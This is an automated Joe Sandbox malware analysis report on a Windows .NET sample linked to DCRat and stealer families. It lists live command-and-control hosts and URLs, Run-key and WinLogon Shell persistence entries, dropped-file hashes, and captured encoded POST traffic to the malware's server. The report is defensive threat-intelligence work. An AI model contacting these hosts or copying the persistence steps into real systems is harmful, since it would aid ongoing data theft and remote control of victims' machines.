uV7ZCuCyFP.8.dr, C8TzAweWcR.8.dr, PCEHZ8WFFm.8.dr, RVXqOeieD9.8.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	wl6u8IBdDL.8.dr, 3R4C3berUq.8.dr, fxBB58GFxm.8.dr, Sz2didTDsQ.8.dr, dzr1IbElpJ.8.dr, 3mH0e2wtGq.8.dr, BQnmgjEPAd.8.dr, EDNFNRqRCX.8.dr, r6nO9PrJ2r.8.dr, RQS80wxHC2.8.dr, 4VNTeugUym.8.dr, QIM4VpF7vn.8.dr, xs44qKjcu4.8.dr, axygeUNep6.8.dr, E18nFEV4jl.8.dr, A0TnQG2wZy.8.dr, PAT9mlbxus.8.dr, BSqLFpKJBy.8.dr, 9Serf4iVwm.8.dr, p8zvYAKG67.8.dr, LHhG3wYAvF.8.dr	false		high
http://117813cm.n9shteam.in	qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, qioiNOJzhriMVnsRuLz.exe, 00000008.00000002.4109389958.0000000002B52000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.44.238.250	117813cm.n9shteam.in	France		49434	HARMONYHOSTING-ASFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552622
Start date and time:	2024-11-09 06:51:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QMT2731i8k.exe renamed because original name is a hash value
Original Sample Name:	2d94c0a9c700f4a1552a1e2fe2cd33e2.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@25/342@1/1
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 69% Number of executed functions: 303 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target QMT2731i8k.exe, PID 3220 because it is empty
Execution Graph export aborted for target QMT2731i8k.exe, PID 6092 because it is empty
Execution Graph export aborted for target QMT2731i8k.exe, PID 7544 because it is empty
Execution Graph export aborted for target QMT2731i8k.exe, PID 7748 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 180 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 404 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 5340 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 7604 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 7808 because it is empty
Execution Graph export aborted for target qioiNOJzhriMVnsRuLz.exe, PID 8144 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:52:02	API Interceptor	12329859x Sleep call for process: qioiNOJzhriMVnsRuLz.exe modified
05:51:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
05:52:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QMT2731i8k "C:\Users\user\Desktop\QMT2731i8k.exe"
05:52:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
05:52:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QMT2731i8k "C:\Users\user\Desktop\QMT2731i8k.exe"
05:52:35	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
05:52:43	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run QMT2731i8k "C:\Users\user\Desktop\QMT2731i8k.exe"
05:52:59	Autostart	Run: WinLogon Shell "C:\Recovery\qioiNOJzhriMVnsRuLz.exe"
05:53:07	Autostart	Run: WinLogon Shell "C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe"
05:53:16	Autostart	Run: WinLogon Shell "C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe"
05:53:24	Autostart	Run: WinLogon Shell "C:\Users\All Users\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe"
05:53:32	Autostart	Run: WinLogon Shell "C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe"
05:53:40	Autostart	Run: WinLogon Shell "C:\Users\user\Desktop\QMT2731i8k.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.44.238.250	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	452132cm.n9shteam2.top/Processdownloads.php
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	rollsroys.top/externaljsapisql.php
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	merlion.top/PythongameTrafficDatalifepublic.php
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HARMONYHOSTING-ASFR	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	HcEvQKWAu2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse	37.44.238.250
	FuWRu2Mg82.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	QDJA9geR12.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	Q9AQFOA6YC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	37.44.238.250

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\EPzTPNOj.log	EQdhBjQw4G.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3AAyq819Vy.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	TGh6AUbQkh.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse
	VfKk5EmvwW.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cGZV10VyWC.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	9D7RwuJrth.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qZoQEFZUnv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	01YP9Lwum8.exe	Get hash	malicious	DCRat	Browse

Process:	C:\Users\user\Desktop\QMT2731i8k.exe
File Type:	ASCII text, with very long lines (855), with no line terminators
Category:	dropped
Size (bytes):	855
Entropy (8bit):	5.91582805187468
Encrypted:	false
SSDEEP:	24:RGlhGehG8HNhM/kyVtPMF682p90y/j/XM3cJvvAeJh:RGphNHN2/kyV9Dvj4Cvdv
MD5:	E03B1C229FADDE156622387442E62F09
SHA1:	2CF2AF2B9BE801F92F38E02C85FC427F3538BCA6
SHA-256:	997225A31ECB345B79C97576858D2ABBA430A31B01763038BF968569BC11093F
SHA-512:	8F4015EC8D8FE8467C1DFB847DB96C462E062F17EB11E1167A4B23FFF12F39467E7B304A8C453414B402E1EB1742A020F9DB35988246C6E229322CDE1A3F1578
Malicious:	false
Reputation:	low
Preview:	iG7RQzr1OWsk4LOvARkQVEDNVGA9xQPISyQ9hHZ9e9nfBI91J9s4JueeCt5JysE7GkRG4PN31kwWbiMNHJzxiU8iTv6xMPLv5pYa0364vzDj7IDehsCp2QZwmtwISZrlYBavJvWNM5BsRYkKscQdNf2pPmyHGxlWIbK6sRUwVyc7OqeNIma0JNY3Ivfg6OHZUpk0OnbaHdIYD5ajIl8dXvM5DRy7wxzGrDmiGn9fK9tpE9zMU6YVQnBjdox6zeoToBrAS2cemdSYBg0DblnzZe0EBDEb0CqqUZBCSz3bd4twUnh6yteN0y3JLm9PxBnjxmDlfyumrLVfvDtXgHnGhczff21p0oncQJ9sk5b992gpcYXI3lspXhCUwhFm7FwDi3OmDAxlqnHp6KDHetwO57FtHp5DzzC3FcHjJvE2yH9tZWYme8INShHkyfeYEtv0kNjdDd7so3ax8VTuQTi0qykhVhvoRpyEWIJLw4iABajZHTlcMuHuK4KvmCIgrTb8FVbzLI7VvizQPLZB5ScgiD3b8XiuwCSs8kUv1wRDwv9mE4fbmGlZ14aCc91yjNjsPHRp0oJIBYtwDQXE1HIqb30EJST25cejMQX7m0k86cXdKo8Lmw6cE3RVQNfiURNi3Kjw3ZbBgJt8fX3fTIPIgCeT8BqZUCooOzjAELSMV555JT03UAOLCFB1pQx1tCqefEtqy2aH0CxlGjJpLxFUxcmJxrVyXadSObZFjJEbjGVARauFGIq66VqDck3GhltZieWpKEFBsnuqGm1W7PrPuhW2uVm9Q838X6bxDF5BCoNTl97zsgIS4epBIe4ybGvtuwTKLET2TpMFTCRvYwRtzlD

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Nov 9 07:25:50 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1956
Entropy (8bit):	4.553305499211729
Encrypted:	false
SSDEEP:	24:HPO9/OPZotDfHdtwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:hPZox9OKhmMluOulajfqXSfbNtmh1Z
MD5:	316E080CF19861338F3585ED6B8411DB
SHA1:	4BAD04F3711B0C099A1F9621D34EE3F4AB61FD66
SHA-256:	511DE41469A3C53BB2EE9312EBC9FB1A9F52AE7E744D940405A156176B7FE62B
SHA-512:	35095DAEF2AD8E8BA4548BEAF1E34B1B36E3BB5F3094182AFB8E1EEB3B86E359EDE98DEC2F456F735C823B74FA453D8BB06723B8C66D66FE336DCCFF1A71D70A
Malicious:	false
Preview:	L...~./g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........=....c:\Windows\System32\CSCD6A0005F729947378317C8DDF47B6938.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES88DB.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.8209446044596875
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXJMVRXLcVzQEKvpzFdNvj:Vx993DEU4Mnkz1cV
MD5:	F1468397B0FA7E06124D68C71D1DE327
SHA1:	47692F6107948E2ACEB9CA09F6B02C242D49E70D
SHA-256:	128D839FFC74A2BB6C1074D982CCE1CB3E732AAC647456E9CBBBAE9CCE0B2234
SHA-512:	6039FE6DBD3E4953905853C5D43B90FD688A2F4D03DE4CB1B5E5EC16B0D2DB5EE5AFE47BFCE5B2ED02B4D7DDFF4BCA71BE1276292DC995743E1F56B2D3012D03
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 09/11/2024 02:25:51..02:25:51, error: 0x80072746.02:25:56, error: 0x80072746.

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Entropy (8bit):	7.562502592112788
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	QMT2731i8k.exe
File size:	437'228 bytes
MD5:	2d94c0a9c700f4a1552a1e2fe2cd33e2
SHA1:	7dfe6f390ea59bc8d53431cd3a4756c109e201ee
SHA256:	352bb05902750f30bd3bc84600d65cad64eeae01c8e794ddb45a0d8453f691e9
SHA512:	4add372efa87a762a63c528699b84ce3f0ad4f4f4966fb58a721d92a9d5e1f2acc49e8e406c89a25ba1698cb1ceb0714e9b63109ba3a26b24ee696096ce855f4
SSDEEP:	12288:mDLfHXFL+Kfcos8Us9s4R1d4j7nwlmyAgn/fT:mtyUAQnR+7wlmy7/7
TLSH:	B99412B68359B4BAD3ED1F71EFA59990880950647ADC31EEEE6443C411F091CC798BB3
File Content Preview:	MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`.............................

Entrypoint:	0x402e5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4D0126C5 [Thu Dec 9 18:58:13 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e0c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe64	0x1000	0baf8508519d41cdff0b3d392bf7f161	False	0.550048828125	data	5.290703402026259	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x320	0x400	574e65dbca3f3dca430748b98fa97b40	False	0.3505859375	data	2.6411336922484443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	30e7f48ca686119ae53b771657df3acf	False	1.009765625	data	6.5181597165446306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 06:52:02.574517012 CET	52875	53	192.168.2.4	1.1.1.1
Nov 9, 2024 06:52:02.586472034 CET	53	52875	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 06:52:02.596254110 CET	274	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 9, 2024 06:52:02.952805996 CET	344	OUT	Data Raw: 00 00 01 01 06 0c 01 02 05 06 02 01 02 02 01 07 00 06 05 0c 02 04 03 0d 01 04 0c 03 03 07 00 05 0d 55 03 0a 02 01 04 50 0f 03 04 0b 04 0b 07 51 06 04 0e 0b 0f 05 04 06 07 05 06 07 04 50 06 00 03 07 0f 5d 04 06 07 08 0c 05 0e 52 0f 51 0d 02 02 0c Data Ascii: UPQP]RQ_T\L}Rh^vvqj_aeUU\|\|}B`lpk]s_{BQKxcb\|TcTwg`~O~V@{}b}re
Nov 9, 2024 06:52:03.404980898 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:03.498992920 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1312 Connection: keep-alive Data Raw: 56 4a 7e 07 78 6e 63 03 6c 62 7c 05 68 62 74 5a 7e 49 7c 53 68 4e 66 50 79 73 7f 5f 7e 5c 56 03 63 5d 6a 52 6e 72 69 03 77 76 55 5b 6a 61 78 01 55 4b 71 42 74 4c 67 03 7f 5c 62 5f 7d 77 6a 08 6c 65 68 0b 6a 4d 67 00 76 62 5c 5b 60 5f 75 4a 6b 58 7e 02 6a 55 7f 50 69 01 63 07 61 5c 7b 06 7c 5c 7d 05 6a 4e 75 00 7b 67 74 00 79 74 74 05 7b 7d 55 49 79 71 60 03 78 63 6e 07 6b 59 74 4b 6f 01 6f 5b 7e 72 67 06 77 62 73 5a 7a 51 41 5b 7c 64 67 53 7d 62 65 4e 76 52 68 4f 78 6c 5a 49 60 4e 50 4e 79 61 53 00 7d 52 72 4e 6f 72 69 59 61 63 7b 4b 75 72 78 07 63 72 7e 50 7e 5d 79 5f 77 72 6e 5c 61 65 52 09 7e 6f 76 5c 77 6f 60 04 7e 73 6c 49 78 6c 5a 5a 6c 63 76 00 7c 6d 6f 51 74 77 6c 07 69 62 6d 50 7e 0b 67 0c 7b 53 76 4e 69 5b 7e 5b 7b 5d 46 51 7d 6c 73 51 6a 70 63 51 7e 77 62 06 6f 53 73 02 6c 5b 7f 5b 7e 71 77 01 7d 67 51 0b 7f 60 7d 09 7b 60 68 42 7e 5b 7c 05 76 73 53 51 7b 5c 79 07 75 48 7c 4b 7e 66 74 07 7d 58 75 0c 77 62 59 44 7f 62 69 4d 7d 77 58 43 79 76 7c 0b 7c 63 67 00 75 5c 53 05 74 4f 75 00 7c 5f [TRUNCATED] Data Ascii: VJ~xnclb\|hbtZ~I\|ShNfPys_~\Vc]jRnriwvU[jaxUKqBtLg\b_}wjlehjMgvb\[`_uJkX~jUPica\{\|\}jNu{gtytt{}UIyq`xcnkYtKoo[~rgwbsZzQA[\|dgS}beNvRhOxlZI`NPNyaS}RrNoriYac{Kurxcr~P~]y_wrn\aeR~ov\wo`~slIxlZZlcv\|moQtwlibmP~g{SvNi[~[{]FQ}lsQjpcQ~wboSsl[[~qw}gQ`}{`hB~[\|vsSQ{\yuH\|K~ft}XuwbYDbiM}wXCyv\|\|cgu\StOu\|_b~\|t}IUwakxrS}`mxwpCygtxmQybdF{]z\|N\|{Y\|~\s@vqt}lwEI\|qWNvB^xlpKvpzy_S}BvLxOjv]]v_`tO\NvwbSLvep@laOwlt\|M`{\|gxpvm^AvglOb~\|m]@{mP}L[}`dA\|RZppO}gTC{}g{\xakD\|wA^ezs\|bdItMeByqSDvv\|E}vhvqtbs\WLgzCxXhO}]cvL[Ovq}G~av}\|p@gUuacxb[}p[xIpL{IlxCgy\lxcv{]NZ{I\|j\RZubxi\|^_hdkR}qqvBRoU{]c^byaSI~lr_z\yvxBagx[L~Jx^ztbaa`hoec\|^hMx{dZl`eX\|m]Uwg{\~LmPzSYQ`q}@ifMQAfLjsNQtOwTnV@TwZx\EZ~gU\|zTzMtibpFc`vRm_v_v_t~Xs^}HzQtb^Zh\y\}]@PloNPpJbTCar\Rme]SdPZ{KvOEx\m^q{p{ZpFTV]UwBQ`SFPXYWkgz\Y^jrsCQpH{ZFQhbO[Ao]Da}UnXFQQz\|Ya]]ppIq\B_caORsKcT@`sTk\C[SwCkplZyQ[ywy]hnN[{oXQa^PT`VTnCd[vC [TRUNCATED]
Nov 9, 2024 06:52:03.499006987 CET	233	IN	Data Raw: 55 6b 04 09 04 50 5d 61 40 53 67 0c 50 51 60 67 59 77 5f 72 60 5b 58 54 00 6b 62 62 56 65 0b 67 51 54 74 64 49 71 72 0b 5d 7c 73 7e 44 69 6c 72 43 6f 01 7c 5d 7a 70 73 5b 6c 6e 0b 46 55 7e 63 5f 54 60 02 50 6b 06 00 46 52 74 59 46 69 61 03 07 69 Data Ascii: UkP]a@SgPQ`gYw_r`[XTkbbVegQTtdIqr]\|s~DilrCo\|]zps[lnFU~c_T`PkFRtYFiai[ik{ZxK{XPUZ{EQoUA[XSVRoZW[a~a`_q_Z_p\@PkeAZq@bUMiH]]UU`k_RY[\|]DZhoOZtAj[MkNNWTSFT~f\hgx{QpJyYUTQuGQnVCTZPb_V^Mkgy}^sVn
Nov 9, 2024 06:52:03.557120085 CET	250	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 384 Expect: 100-continue
Nov 9, 2024 06:52:03.788045883 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:03.788198948 CET	384	OUT	Data Raw: 5d 53 59 5e 55 58 50 57 5a 5e 55 5a 52 54 5b 5d 58 55 5a 43 51 52 5a 58 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: ]SY^UXPWZ^UZRT[]XUZCQRZX^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV"?101#34::(P=>8,.=\0,-R4,;V0>/$/8<&Y%%Z/+
Nov 9, 2024 06:52:04.091223001 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 09 Nov 2024 05:52:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0e 1f 20 0c 3f 3d 28 08 30 39 28 00 2f 54 2e 0d 26 3b 27 18 3b 01 02 5e 25 3e 28 00 2c 2d 02 50 22 28 32 03 37 2f 39 13 3c 2f 25 53 35 10 2f 5a 0c 1f 23 12 3c 3d 29 01 33 00 30 1e 2c 13 0e 18 22 34 22 5b 2b 2f 35 51 31 10 29 5f 34 0f 0b 56 3d 3d 2d 02 2d 3b 0e 5f 2f 0e 34 1c 25 05 2d 5e 0e 14 20 19 3f 3e 39 02 22 20 36 5d 34 32 23 1a 20 2e 38 1f 2a 05 23 53 3f 3b 21 01 3d 0d 05 0e 36 04 33 0f 21 22 35 05 27 3a 2b 1e 32 03 26 52 20 05 20 50 01 35 5c 51 Data Ascii: ?=(09(/T.&;';^%>(,-P"(27/9</%S5/Z#<=)30,"4"[+/5Q1)_4V==--;_/4%-^ ?>9" 6]42# .8*#S?;!=63!"5':+2&R P5\Q
Nov 9, 2024 06:52:04.425745010 CET	251	OUT	POST /ExternalRequest.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 117813cm.n9shteam.in Content-Length: 1836 Expect: 100-continue
Nov 9, 2024 06:52:04.656609058 CET	25	IN	HTTP/1.1 100 Continue
Nov 9, 2024 06:52:04.656903028 CET	1836	OUT	Data Raw: 58 5f 59 54 50 58 55 5c 5a 5e 55 5a 52 56 5b 5c 58 5a 5a 40 51 58 5a 5b 5e 58 41 58 50 5c 5f 51 5b 5e 57 51 5e 5d 5b 52 47 59 5e 50 5f 5c 50 5a 5a 53 59 50 41 5c 58 5b 5a 5f 56 50 54 58 50 40 5b 52 5c 5d 56 5e 57 54 5e 5b 5b 5e 5d 50 5b 56 52 58 Data Ascii: X_YTPXU\Z^UZRV[\XZZ@QXZ[^XAXP\_Q[^WQ^][RGY^P_\PZZSYPA\X[Z_VPTXP@[R\]V^WT^[[^]P[VRXP^V^^\WWVSXZWXX\_QPYY\\RY\]_D^^[Z^CX\WPYXQTS^S_YVW_RT^_YP_[X\W__Y^QY_XB^D_Q\[^GUQ]]P[T\\VU\XU_Y_Z\CPUV!](36[$.V5?D:8=-7;=-0)4/+P%=#$,,&Y%%Z/
